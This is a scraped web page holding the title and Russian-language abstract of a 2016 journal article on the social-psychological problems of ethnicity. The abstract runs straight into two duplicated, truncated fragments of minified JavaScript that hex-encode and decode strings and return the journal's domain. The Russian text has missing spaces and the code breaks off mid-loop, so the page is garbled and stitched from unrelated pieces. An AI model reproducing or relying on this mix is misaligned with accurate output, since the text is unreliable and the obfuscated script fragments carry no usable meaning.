СОЦИАЛЬНО-ПСИХОЛОГИЧЕСКИЕ ПРОБЛЕМЫ ЭТНИЧНОСТИ (The Journal of Psychology and Sociology, 2016)
Феномен этничности на современном этапе развития науки трудно выразитьпосредством какой-то точной дефиниции. С одной стороны, это представление онаследуемой групповой солидарности, основанное на представлениях об общихпроисхождении, исторических судьбах, интересах и культуре. С другой стороны, такиепредставления вырабатываются реально существующими группами людей, народами,занимающими относительно обособленное положение в окружающей социальной среде.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e